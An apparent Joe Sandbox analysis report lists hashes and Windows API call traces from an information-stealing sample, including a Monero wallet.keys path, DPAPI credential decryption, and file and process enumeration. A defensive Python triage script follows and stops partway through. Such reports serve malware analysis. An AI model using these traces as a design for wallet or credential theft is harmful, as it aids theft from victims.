                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %GIO$:"wn$;LuW$;LuW$Dx<x$q#;$wQo
                          • API String ID: 0-3945747622
                          • Opcode ID: c3fc3522d193be46f7e474679371107144005e444474cc9b4885c4cb2281b8a1
                          • Instruction ID: 6f574d81c7c44490a19e51bba526d1355842efff099d2582d3fa4063a4586be8
                          • Opcode Fuzzy Hash: c3fc3522d193be46f7e474679371107144005e444474cc9b4885c4cb2281b8a1
                          • Instruction Fuzzy Hash: 6CB217F3A0C2049FE304AE2DEC8567AFBE9EF94320F16493DE6C5C7744E63598418696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $+^;$;/w$=Rw/$c+^>$n+V$n+V$]_]
                          • API String ID: 0-4137713963
                          • Opcode ID: 3364906f2297da66c5644aff4e8bdd0c1204df6723b83a07ba48bae82d2c2161
                          • Instruction ID: 161473fd22b3ff2a82c331e1b519f85a18a7251ad895004cb7740b679574c437
                          • Opcode Fuzzy Hash: 3364906f2297da66c5644aff4e8bdd0c1204df6723b83a07ba48bae82d2c2161
                          • Instruction Fuzzy Hash: ACB2F7F3A0C204AFE3046E29DC4567AF7E5EFD4720F1A893DE6C4C3744EA3598458696
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00140D73), ref: 0012E4A2
                          • StrCmpCA.SHLWAPI(?,001414F8), ref: 0012E4F2
                          • StrCmpCA.SHLWAPI(?,001414FC), ref: 0012E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                          • Instruction ID: 943155b9e8a84cf15600d4df7871d17542093e3f6dd393d9d3d8fa5e459b70d1
                          • Opcode Fuzzy Hash: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                          • Instruction Fuzzy Hash: 8A122272910118AADB15FB70DCA6EED7378AF64300FC045E9B54AA6191EF306F49CF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '&$$$wO$j_$p^1 $>EG
                          • API String ID: 0-2169947235
                          • Opcode ID: 5ebca3bf0a8992c65101519c494880a7b65997567cd7dc7b9453fcce9b6bf798
                          • Instruction ID: c4709fefebc1e2311e1c9e059f134d00008cd27487baa0509077bf6fd0e7dd12
                          • Opcode Fuzzy Hash: 5ebca3bf0a8992c65101519c494880a7b65997567cd7dc7b9453fcce9b6bf798
                          • Instruction Fuzzy Hash: F3B207F3A0C2149FE3046E29EC8567ABBE9EF94720F1A493DEAC4D3740E67558018797
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                          • lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                          • lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                          • lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: c079b24890c483120b347e4d738d8d4ba26ab6db31ede421f3a634878d42c9fc
                          • Instruction ID: 3f732ae6ec78358692111cf0f23ea8ad629565133b3c8a28cf53c121e2046cef
                          • Opcode Fuzzy Hash: c079b24890c483120b347e4d738d8d4ba26ab6db31ede421f3a634878d42c9fc
                          • Instruction Fuzzy Hash: C2412FB990421ADFDB10DF94DD89BEEB7B8FB48704F1045A8E609A7280D7B15A84CF91
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0013696C
                          • sscanf.NTDLL ref: 00136999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369C0
                          • ExitProcess.KERNEL32 ref: 001369DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                          • Instruction ID: 362fc58acba6113489f9a8793d8a2b8a493f7c72814477dc0c0a0d98de1b6306
                          • Opcode Fuzzy Hash: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                          • Instruction Fuzzy Hash: 0821E9B5D00208AFCF05EFE4D945AEEBBB9BF48300F04856AE406F3250EB745604CBA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00127254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00127281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001272A4
                          • LocalFree.KERNEL32(?), ref: 001272AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                          • Instruction ID: 5847988b458b6ae84ee6490667c59c53c6e4e8377666f5356d05359ae0decdfb
                          • Opcode Fuzzy Hash: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                          • Instruction Fuzzy Hash: AF011275A44208BBDB14DFD4DD45F9E7BB8EB44704F108158FB05BB2C0D7B0AA008B65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0013961E
                          • Process32First.KERNEL32(00140ACA,00000128), ref: 00139632
                          • Process32Next.KERNEL32(00140ACA,00000128), ref: 00139647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0013965C
                          • CloseHandle.KERNEL32(00140ACA), ref: 0013967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                          • Instruction ID: 3edae1e8f62b6e73cc3241cfb8baffce8ae030b9dd094dcc89063519ea017851
                          • Opcode Fuzzy Hash: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                          • Instruction Fuzzy Hash: E9011EB5A01208EBCB15DFA5CD49BEDBBF8EB48300F108188E909A7250E7B4AB40DF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '5~w$B>$\Zt$`I%
                          • API String ID: 0-2711800056
                          • Opcode ID: 67fc0c344a1dbe8e6ca7a1da2753367dfefd181898764127c1493b907b4c8667
                          • Instruction ID: 4b581b72842d59218ee1b182d71ecd874290f5e5f23246d5df35e08ded04ebe7
                          • Opcode Fuzzy Hash: 67fc0c344a1dbe8e6ca7a1da2753367dfefd181898764127c1493b907b4c8667
                          • Instruction Fuzzy Hash: C6B205F360C2009FE704AE29EC8567ABBE6EF94720F16893DE6C5C3744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: L6V$!8~$8So_${:/g
                          • API String ID: 0-2454544636
                          • Opcode ID: b385c68f1b234b6f715867db2a6870bfd3e46f12fc7c122a10cf608cd13ae974
                          • Instruction ID: 057452e07ad86fc1c4a97cf14ecbdcc355cad29e5b964f35856eb4633d600f20
                          • Opcode Fuzzy Hash: b385c68f1b234b6f715867db2a6870bfd3e46f12fc7c122a10cf608cd13ae974
                          • Instruction Fuzzy Hash: 80A229F360C2149FE308AE2DEC8577AB7E9EF94320F1A853DE6C5C3744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <Ky$Z@n}$t`>9${>A(
                          • API String ID: 0-2201754280
                          • Opcode ID: 0b0cd1929b1e12e4a33be3ff3a4e16cbe2e16b1a1db05965ec6491e2b00303f2
                          • Instruction ID: a055b9889c8517b813b9322625d9ed34cffcf1e3eb18ad137ffd1bb40f007fbc
                          • Opcode Fuzzy Hash: 0b0cd1929b1e12e4a33be3ff3a4e16cbe2e16b1a1db05965ec6491e2b00303f2
                          • Instruction Fuzzy Hash: A3A2F5F36082009FE7046E2DEC8567ABBE9EF94720F1A493DEAC5C7744E63598048797
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00125184,40000001,00000000,00000000,?,00125184), ref: 00138EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                          • Instruction ID: 7a21b8ce29f47e9c068e362a5d468760735ccacea5f86b5f6aa31d0ebbe5e4da
                          • Opcode Fuzzy Hash: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                          • Instruction Fuzzy Hash: AA11E274200309BFDB04CFA4E889FAB37AEAF89714F109558F9198B250DB76ED41DB60
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                          • LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                          • Instruction ID: 67ed3dafb67d0a7fedddcb1e82be47ae590effd6e0680059dc5d6bfbb7d2511b
                          • Opcode Fuzzy Hash: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                          • Instruction Fuzzy Hash: 1111A4B4240208AFEB11CF64DC95FAA77B9FB89700F208058F9159B390C7B5A901DB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F0F1B8,00000000,?,00140E10,00000000,?,00000000,00000000), ref: 00137A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F0F1B8,00000000,?,00140E10,00000000,?,00000000,00000000,?), ref: 00137A7D
                          • wsprintfA.USER32 ref: 00137AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                          • Instruction ID: fc0b8ddb439fc33d1b45ecd01425a5b76859a9b5b7cb31ea09802831848f10bc
                          • Opcode Fuzzy Hash: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                          • Instruction Fuzzy Hash: 8A118EB1945618EBEB208B54DC49FA9BBB8FB04721F10479AE90AA32C0C7741A40CF51
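The API lists in the blocks above are the only view of these functions the report gives. The script below is an added example, not part of the Joe Sandbox report and not code recovered from the sample: it parses blocks in this page's format, names the bits of the flag arguments whose position is fixed by the documented Win32 prototype (the dwFlags of CreateToolhelp32Snapshot, CryptBinaryToStringA, CryptStringToBinaryA and CryptUnprotectData), and attaches a capability label to each block. The label names and the RULES and FLAG_DECODERS tables are this example's own choices, not Joe Sandbox signatures; the embedded input is a constructed subset of the API lines copied from the blocks above.

```python
"""Capability triage for the per-function "APIs" blocks of a Joe Sandbox report.
Added example, not part of the report and not code from the analysed sample: it
parses bullet lines in the page's format, names the bits of flag arguments whose
position is fixed by the documented Win32 prototype, and attaches capability
labels. RULES, FLAG_DECODERS and the label names are this example's own.
"""
import re
from dataclasses import dataclass, field

# Constructed input: a subset of the API lines from the function blocks above.
SAMPLE = """APIs
• sscanf.NTDLL ref: 00136999
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369B2
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369C0
• ExitProcess.KERNEL32 ref: 001369DA
Memory Dump Source
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012724D
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00127281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001272A4
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0013961E
• Process32First.KERNEL32(00140ACA,00000128), ref: 00139632
• Process32Next.KERNEL32(00140ACA,00000128), ref: 00139647
• StrCmpCA.SHLWAPI(?,00000000), ref: 0013965C
Memory Dump Source
APIs
• CryptBinaryToStringA.CRYPT32(00000000,00125184,40000001,00000000,00000000,?,00125184), ref: 00138EC0
Memory Dump Source
"""

# One API bullet: Name.MODULE(optional,args), ref: hexaddr
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

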